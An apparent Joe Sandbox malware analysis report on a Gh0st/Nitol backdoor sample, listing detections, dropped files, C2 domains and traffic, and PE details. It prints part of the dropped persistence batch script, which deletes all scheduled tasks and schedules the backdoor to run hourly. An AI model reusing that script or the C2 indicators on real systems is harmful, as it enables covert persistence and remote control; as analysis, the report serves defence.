          System Owner/User Discovery          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565415 Sample: ILQ18dgzMU.exe Startdate: 29/11/2024 Architecture: WINDOWS Score: 100 35 www.wk1888.com 2->35 37 www.fz0575.com 2->37 39 2 other IPs or domains 2->39 45 Suricata IDS alerts for network traffic 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus detection for dropped file 2->49 51 12 other signatures 2->51 9 ILQ18dgzMU.exe 1 6 2->9         started        14 svchsot.exe 2->14         started        signatures3 process4 dnsIp5 41 expired.gname.net 172.65.190.172, 49736, 49917, 50004 CLOUDFLARENETUS United States 9->41 29 C:\Windows\...\svchsot.exe, PE32 9->29 dropped 31 C:\Windows\...\svchsot.exe:Zone.Identifier, ASCII 9->31 dropped 33 C:\Windows\...\JH.BAT, DOS 9->33 dropped 53 Found stalling execution ending in API Sleep call 9->53 55 Contains functionality to detect virtual machines (IN, VMware) 9->55 57 Checks if browser processes are running 9->57 59 Contains functionality to detect sleep reduction / modifications 9->59 16 cmd.exe 1 9->16         started        file6 signatures7 process8 signatures9 43 Uses schtasks.exe or at.exe to add and modify task schedules 16->43 19 net.exe 1 16->19         started        21 conhost.exe 16->21         started        23 schtasks.exe 1 16->23         started        25 26 other processes 16->25 process10 process11 27 net1.exe 1 19->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          ILQ18dgzMU.exe95%ReversingLabsWin32.Backdoor.Farfli
          ILQ18dgzMU.exe100%AviraBDS/Agent.IR
          ILQ18dgzMU.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe100%AviraBDS/Agent.IR
          C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe100%Joe Sandbox ML
          C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe95%ReversingLabsWin32.Backdoor.Farfli

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          expired.gname.net
          		172.65.190.172
          		truefalse
            		high
            www.af0575.com
            		unknown
            		unknowntrue
              		unknown
              www.wk1888.com
              		unknown
              		unknowntrue
                		unknown
                www.fz0575.com
                		unknown
                		unknowntrue
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  172.65.190.172
                  		expired.gname.netUnited States
                  		13335CLOUDFLARENETUSfalse

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1565415
                  Start date and time:2024-11-29 19:11:05 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 45s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:37
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:ILQ18dgzMU.exe
                  renamed because original name is a hash value
                  Original Sample Name:a153080f9a968b6488cf1cf2e2ea78a3.exe
                  Detection:MAL
                  Classification:mal100.bank.troj.evad.winEXE@64/4@6/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 99%
                  • Number of executed functions: 34
                  • Number of non-executed functions: 230
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • VT rate limit hit for: ILQ18dgzMU.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  13:11:52API Interceptor13042285x Sleep call for process: ILQ18dgzMU.exe modified
                  18:11:54AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run XXXXXX579E5A5B VVVVVVrr2unw== C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  172.65.190.172OVoo3T4wlS.exeGet hashmaliciousGhostRat, NitolBrowse
                    https://daf2019.com/8/02Get hashmaliciousUnknownBrowse

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      expired.gname.netOVoo3T4wlS.exeGet hashmaliciousGhostRat, NitolBrowse
                      • 172.65.190.172
                      https://daf2019.com/8/02Get hashmaliciousUnknownBrowse
                      • 172.65.190.172

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                      • 104.21.16.9
                      weWHT1b7JO.dllGet hashmaliciousUnknownBrowse
                      • 104.26.13.205
                      phish_alert_iocp_v1.4.48 (80).emlGet hashmaliciousInvoiceScamBrowse
                      • 104.17.3.95
                      https://shorturl.at/IFOx4?US=7226wlevGet hashmaliciousUnknownBrowse
                      • 104.21.39.244
                      https://mobile.mail.yahoo.com/apps/affiliateRouter?brandUrl=https://www.google.com/amp/t.co/N0QLoca1EY&appName=YMailNorrin&partner=1&locale=1&pageId=commerce_intent&clickRef=message_header&region=us&annotation=&buckets=&segment=&interactedItem=&slot=&uuid=mailNAGet hashmaliciousUnknownBrowse
                      • 172.66.0.227
                      file.exeGet hashmaliciousLummaC StealerBrowse
                      • 104.21.16.9
                      file.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, LummaC StealerBrowse
                      • 172.67.160.80
                      file.exeGet hashmaliciousAmadey, AsyncRAT, Cryptbot, DcRat, LummaC Stealer, Nymaim, StealcBrowse
                      • 104.21.16.9
                      crypted_LummaC2.exeGet hashmaliciousLummaC StealerBrowse
                      • 104.21.58.9
                      crypted_LummaC2 (3).exeGet hashmaliciousLummaC StealerBrowse
                      • 104.21.58.9

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Windows\SysWOW64\579E5A5B VVVVVVrr2unw==

                      Download File
                      Process:C:\Users\user\Desktop\ILQ18dgzMU.exe
                      File Type:ASCII text, with no line terminators
                      Category:modified
                      Size (bytes):7
                      Entropy (8bit):2.8073549220576046
                      Encrypted:false
                      SSDEEP:3:qR:qR
                      MD5:7A1920D61156ABC05A60135AEFE8BC67
                      SHA1:808D7DCA8A74D84AF27A2D6602C3D786DE45FE1E
                      SHA-256:21B111CBFE6E8FCA2D181C43F53AD548B22E38ACA955B9824706A504B0A07A2D
                      SHA-512:94ABFC7B11F4311E8E279B580907FEFC1118690479FB7E13F0C22ADE816BC2B63346498833B0241EEC2B09E15172E13027DC85024BACB7BC40C150F4131F7292
                      Malicious:false
                      Preview:Default

                      C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\JH.BAT

                      Download File
                      Process:C:\Users\user\Desktop\ILQ18dgzMU.exe
                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1672
                      Entropy (8bit):4.963031619864791
                      Encrypted:false
                      SSDEEP:24:/7zzUCSYaqpzm0s8c3uBUVfaUvUSUYSUYUOsUmUhUdfaUtBWp/idg:jz4wX7idMnG54jCdfftG
                      MD5:D8D3A3C95E9E23157286B883310DB430
                      SHA1:DF3540006561B11EBA293CB19556CB21A5F1CAB7
                      SHA-256:A6557C4D137E61F94DF072AE9F05D890F418388745151263D3278F0020A49BA1
                      SHA-512:B5065A78947236960E6DC632443443570839C47BA6107E091EFD4C84DF7F21A93DFF07D97FC892D69A58CCECB5C04B019E8ADBC718F735B0D9821EE7B82D21BC
                      Malicious:true
                      Preview:@echo off..schtasks /delete /tn * /f..sc config Schedule start= auto ..net start "Task Scheduler"..At 0:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 1:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 2:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 3:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 4:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 5:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 6:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 7:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 8:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 9:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 10:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 11:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 12:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 13:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe..At 14:00 C:\Windows\XXXXXX579

                      C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe

                      Download File
                      Process:C:\Users\user\Desktop\ILQ18dgzMU.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):187392
                      Entropy (8bit):7.748356878725097
                      Encrypted:false
                      SSDEEP:3072:bMqKbTtCSIT0chwzzcdZKF8UvvoeWofjjpAVioRF8s//NLj6h+EvtRU:o9MMmwzlqUHoeWofjjpAViY/lH6h+EvU
                      MD5:A153080F9A968B6488CF1CF2E2EA78A3
                      SHA1:6537F18FB326BCB4D7FC503C40B7BB21A136F560
                      SHA-256:E0989C99125DBC5957C7ECDFDC37FF6B7F31F2979531F3FB8747127243F28B7D
                      SHA-512:B45D7B90D4951E1E03E99763FA78C999BF372C200B0A42F1ECC7959F330A40DB6A563CE3E696E174E37621F120DE25097F712B4003853EE4929B38CA9D6DBEB3
                      Malicious:true
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 95%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1 ..uA..uA..uA...]..tA..Cg..tA...]..xA..Cg..iA...N..pA..uA..[A...^..tA...^..tA...G..tA..RichuA..........PE..L....j.N.................D..........!........`....@.........................................................................Td..<....................................................................................`...............................text....C.......D.................. ..`.rdata..|....`.......H..............@..@.data........p.......R..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................

                      C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe:Zone.Identifier

                      Download File
                      Process:C:\Users\user\Desktop\ILQ18dgzMU.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Preview:[ZoneTransfer]....ZoneId=0

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.748356878725097
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:ILQ18dgzMU.exe
                      File size:187'392 bytes
                      MD5:a153080f9a968b6488cf1cf2e2ea78a3
                      SHA1:6537f18fb326bcb4d7fc503c40b7bb21a136f560
                      SHA256:e0989c99125dbc5957c7ecdfdc37ff6b7f31f2979531f3fb8747127243f28b7d
                      SHA512:b45d7b90d4951e1e03e99763fa78c999bf372c200b0a42f1ecc7959f330a40db6a563ce3e696e174e37621f120de25097f712b4003853ee4929b38ca9d6dbeb3
                      SSDEEP:3072:bMqKbTtCSIT0chwzzcdZKF8UvvoeWofjjpAVioRF8s//NLj6h+EvtRU:o9MMmwzlqUHoeWofjjpAViY/lH6h+EvU
                      TLSH:290412AF387008DBC40D4A70E9E657101C3B92232069E9CF956865DA1E399F4DE3F6DB
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1 ..uA..uA..uA...]..tA..Cg..tA...]..xA..Cg..iA...N..pA..uA..[A...^..tA...^..tA...G..tA..RichuA..........PE..L....j.N...........

                      File Icon

                      Icon Hash:90cececece8e8eb0

                      Static PE Info

                      General

                      Entrypoint:0x401d21
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      DLL Characteristics:
                      Time Stamp:0x4E846A08 [Thu Sep 29 12:52:24 2011 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:29637e11e194dc0202df96c219ccfc7d

                      Entrypoint Preview

                      Instruction
                      push ebp
                      mov ebp, esp
                      push FFFFFFFFh
                      push 004060C0h
                      push 00403CCCh
                      mov eax, dword ptr fs:[00000000h]
                      push eax
                      mov dword ptr fs:[00000000h], esp
                      sub esp, 58h
                      push ebx
                      push esi
                      push edi
                      mov dword ptr [ebp-18h], esp
                      call dword ptr [00406050h]
                      xor edx, edx
                      mov dl, ah
                      mov dword ptr [0042F0A0h], edx
                      mov ecx, eax
                      and ecx, 000000FFh
                      mov dword ptr [0042F09Ch], ecx
                      shl ecx, 08h
                      add ecx, edx
                      mov dword ptr [0042F098h], ecx
                      shr eax, 10h
                      mov dword ptr [0042F094h], eax
                      xor esi, esi
                      push esi
                      call 00007FE574851459h
                      pop ecx
                      test eax, eax
                      jne 00007FE57484FFDAh
                      push 0000001Ch
                      call 00007FE574850085h
                      pop ecx
                      mov dword ptr [ebp-04h], esi
                      call 00007FE574851C69h
                      call dword ptr [0040604Ch]
                      mov dword ptr [0042F59Ch], eax
                      call 00007FE574851B27h
                      mov dword ptr [0042F070h], eax
                      call 00007FE5748518D0h
                      call 00007FE574851812h
                      call 00007FE57485152Fh
                      mov dword ptr [ebp-30h], esi
                      lea eax, dword ptr [ebp-5Ch]
                      push eax
                      call dword ptr [00406048h]
                      call 00007FE5748517A3h
                      mov dword ptr [ebp-64h], eax
                      test byte ptr [ebp-30h], 00000001h
                      je 00007FE57484FFD8h
                      movzx eax, word ptr [ebp-2Ch]
                      jmp 00007FE57484FFD5h
                      push 0000000Ah
                      pop eax
                      push eax
                      push dword ptr [ebp-64h]
                      push esi
                      push esi
                      call dword ptr [00406044h]

                      Rich Headers

                      Programming Language:
                      • [C++] VS98 (6.0) SP6 build 8804
                      • [ C ] VS98 (6.0) SP6 build 8804
                      • [ C ] VS98 (6.0) build 8168
                      • [C++] VS98 (6.0) build 8168
                      • [EXP] VC++ 6.0 SP5 build 8804

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x64540x3c.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x300000x694.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x60000xbc.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x43c70x4400f399b515d887d41363c2a8986fd2221aFalse0.6422909007352942data6.668942253552876IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rdata0x60000x87c0xa00f8ada720da3f3d8a84c341dd08a5664bFalse0.41171875data4.772065786709751IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0x70000x285a00x28200741ac0346f3a7d09f5275dd536bc1b18False0.9349445093457944data7.82627228791118IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0x300000x6940x800820eecc2319367ceca0ccd542acf781dFalse0.267578125data4.279737082084519IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      08114A2C20126301053410x303cc0x46ASCII text, with CRLF line terminators0.5714285714285714
                      22BAF66920126301053410x304140x46ASCII text, with CRLF line terminators0.5714285714285714
                      4226838220126301053410x3045c0x46JSON data0.5714285714285714
                      6C8C337A20126301053410x304a40x46ASCII text, with CRLF line terminators0.5714285714285714
                      9AF1A2EC20126301053410x304ec0x46ASCII text, with CRLF line terminators0.5714285714285714
                      HOST0x305340x104data0.5346153846153846
                      RT_VERSION0x306380x5cdataChineseChina0.6847826086956522

                      Imports

                      DLLImport
                      KERNEL32.dllHeapAlloc, GetProcessHeap, VirtualAlloc, VirtualProtect, VirtualFree, GetProcAddress, LoadLibraryA, IsBadReadPtr, HeapFree, FreeLibrary, ExitProcess, GetFileAttributesA, GetWindowsDirectoryA, GetVersionExA, GetStringTypeA, LCMapStringW, HeapReAlloc, GetModuleHandleA, GetStartupInfoA, GetCommandLineA, GetVersion, GetModuleFileNameA, GetEnvironmentVariableA, HeapDestroy, HeapCreate, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetFileType, RtlUnwind, WriteFile, GetCPInfo, GetACP, GetOEMCP, MultiByteToWideChar, LCMapStringA, GetStringTypeW
                      USER32.dllwsprintfA

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      ChineseChina

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2024-11-29T19:12:53.559954+01002013214ET MALWARE Gh0st Remote Access Trojan Encrypted Session To CnC Server1192.168.2.449736172.65.190.1728000TCP
                      2024-11-29T19:12:53.559954+01002016922ET MALWARE Backdoor family PCRat/Gh0st CnC traffic1192.168.2.449736172.65.190.1728000TCP
                      2024-11-29T19:14:19.251251+01002013214ET MALWARE Gh0st Remote Access Trojan Encrypted Session To CnC Server1192.168.2.449917172.65.190.1728000TCP
                      2024-11-29T19:14:19.251251+01002016922ET MALWARE Backdoor family PCRat/Gh0st CnC traffic1192.168.2.449917172.65.190.1728000TCP
                      2024-11-29T19:15:44.988375+01002013214ET MALWARE Gh0st Remote Access Trojan Encrypted Session To CnC Server1192.168.2.450004172.65.190.1728000TCP
                      2024-11-29T19:15:44.988375+01002016922ET MALWARE Backdoor family PCRat/Gh0st CnC traffic1192.168.2.450004172.65.190.1728000TCP

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Nov 29, 2024 19:12:53.400191069 CET497368000192.168.2.4172.65.190.172
                      Nov 29, 2024 19:12:53.520184040 CET800049736172.65.190.172192.168.2.4
                      Nov 29, 2024 19:12:53.520293951 CET497368000192.168.2.4172.65.190.172
                      Nov 29, 2024 19:12:53.559953928 CET497368000192.168.2.4172.65.190.172
                      Nov 29, 2024 19:12:53.680284023 CET800049736172.65.190.172192.168.2.4
                      Nov 29, 2024 19:12:54.451337099 CET800049736172.65.190.172192.168.2.4
                      Nov 29, 2024 19:12:54.451412916 CET497368000192.168.2.4172.65.190.172
                      Nov 29, 2024 19:12:54.451486111 CET497368000192.168.2.4172.65.190.172
                      Nov 29, 2024 19:14:19.015290976 CET499178000192.168.2.4172.65.190.172
                      Nov 29, 2024 19:14:19.135548115 CET800049917172.65.190.172192.168.2.4
                      Nov 29, 2024 19:14:19.141808987 CET499178000192.168.2.4172.65.190.172
                      Nov 29, 2024 19:14:19.251250982 CET499178000192.168.2.4172.65.190.172
                      Nov 29, 2024 19:14:19.371258974 CET800049917172.65.190.172192.168.2.4
                      Nov 29, 2024 19:14:20.073160887 CET800049917172.65.190.172192.168.2.4
                      Nov 29, 2024 19:14:20.073224068 CET499178000192.168.2.4172.65.190.172
                      Nov 29, 2024 19:14:20.073352098 CET499178000192.168.2.4172.65.190.172
                      Nov 29, 2024 19:15:44.650701046 CET500048000192.168.2.4172.65.190.172
                      Nov 29, 2024 19:15:44.771245003 CET800050004172.65.190.172192.168.2.4
                      Nov 29, 2024 19:15:44.774311066 CET500048000192.168.2.4172.65.190.172
                      Nov 29, 2024 19:15:44.988374949 CET500048000192.168.2.4172.65.190.172
                      Nov 29, 2024 19:15:45.108714104 CET800050004172.65.190.172192.168.2.4
                      Nov 29, 2024 19:15:45.707020044 CET800050004172.65.190.172192.168.2.4
                      Nov 29, 2024 19:15:45.708409071 CET500048000192.168.2.4172.65.190.172
                      Nov 29, 2024 19:15:45.708491087 CET500048000192.168.2.4172.65.190.172

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Nov 29, 2024 19:11:53.825917006 CET5118553192.168.2.41.1.1.1
                      Nov 29, 2024 19:11:54.811140060 CET5118553192.168.2.41.1.1.1
                      Nov 29, 2024 19:11:55.811650038 CET5118553192.168.2.41.1.1.1
                      Nov 29, 2024 19:11:56.670790911 CET53511851.1.1.1192.168.2.4
                      Nov 29, 2024 19:11:56.670805931 CET53511851.1.1.1192.168.2.4
                      Nov 29, 2024 19:11:56.670815945 CET53511851.1.1.1192.168.2.4
                      Nov 29, 2024 19:11:56.673536062 CET5959053192.168.2.41.1.1.1
                      Nov 29, 2024 19:11:56.850616932 CET53595901.1.1.1192.168.2.4
                      Nov 29, 2024 19:11:56.851383924 CET6255353192.168.2.41.1.1.1
                      Nov 29, 2024 19:11:57.135943890 CET53625531.1.1.1192.168.2.4
                      Nov 29, 2024 19:12:52.921065092 CET5342053192.168.2.41.1.1.1
                      Nov 29, 2024 19:12:53.397728920 CET53534201.1.1.1192.168.2.4

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Nov 29, 2024 19:11:53.825917006 CET192.168.2.41.1.1.10x8f9bStandard query (0)www.wk1888.comA (IP address)IN (0x0001)false
                      Nov 29, 2024 19:11:54.811140060 CET192.168.2.41.1.1.10x8f9bStandard query (0)www.wk1888.comA (IP address)IN (0x0001)false
                      Nov 29, 2024 19:11:55.811650038 CET192.168.2.41.1.1.10x8f9bStandard query (0)www.wk1888.comA (IP address)IN (0x0001)false
                      Nov 29, 2024 19:11:56.673536062 CET192.168.2.41.1.1.10x8beStandard query (0)www.af0575.comA (IP address)IN (0x0001)false
                      Nov 29, 2024 19:11:56.851383924 CET192.168.2.41.1.1.10x1c5aStandard query (0)www.fz0575.comA (IP address)IN (0x0001)false
                      Nov 29, 2024 19:12:52.921065092 CET192.168.2.41.1.1.10x1c98Standard query (0)www.wk1888.comA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Nov 29, 2024 19:11:56.670790911 CET1.1.1.1192.168.2.40x8f9bServer failure (2)www.wk1888.comnonenoneA (IP address)IN (0x0001)false
                      Nov 29, 2024 19:11:56.670805931 CET1.1.1.1192.168.2.40x8f9bServer failure (2)www.wk1888.comnonenoneA (IP address)IN (0x0001)false
                      Nov 29, 2024 19:11:56.670815945 CET1.1.1.1192.168.2.40x8f9bServer failure (2)www.wk1888.comnonenoneA (IP address)IN (0x0001)false
                      Nov 29, 2024 19:11:56.850616932 CET1.1.1.1192.168.2.40x8beName error (3)www.af0575.comnonenoneA (IP address)IN (0x0001)false
                      Nov 29, 2024 19:11:57.135943890 CET1.1.1.1192.168.2.40x1c5aName error (3)www.fz0575.comnonenoneA (IP address)IN (0x0001)false
                      Nov 29, 2024 19:12:53.397728920 CET1.1.1.1192.168.2.40x1c98No error (0)www.wk1888.comexpired.gname.netCNAME (Canonical name)IN (0x0001)false
                      Nov 29, 2024 19:12:53.397728920 CET1.1.1.1192.168.2.40x1c98No error (0)expired.gname.net172.65.190.172A (IP address)IN (0x0001)false

                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:13:11:52
                      Start date:29/11/2024
                      Path:C:\Users\user\Desktop\ILQ18dgzMU.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\ILQ18dgzMU.exe"
                      Imagebase:0x400000
                      File size:187'392 bytes
                      MD5 hash:A153080F9A968B6488CF1CF2E2EA78A3
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000002.4082870617.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: gh0st, Description: unknown, Source: 00000000.00000002.4082870617.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, Author: https://github.com/jackcr/
                      • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3947674150.0000000000780000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: gh0st, Description: unknown, Source: 00000000.00000003.3947674150.0000000000780000.00000004.00001000.00020000.00000000.sdmp, Author: https://github.com/jackcr/
                      • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000003.3090838933.0000000002150000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: gh0st, Description: unknown, Source: 00000000.00000003.3090838933.0000000002150000.00000004.00001000.00020000.00000000.sdmp, Author: https://github.com/jackcr/
                      Reputation:low
                      Has exited:false

                      General

                      Target ID:1
                      Start time:13:11:52
                      Start date:29/11/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\JH.BAT""
                      Imagebase:0x240000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:2
                      Start time:13:11:52
                      Start date:29/11/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

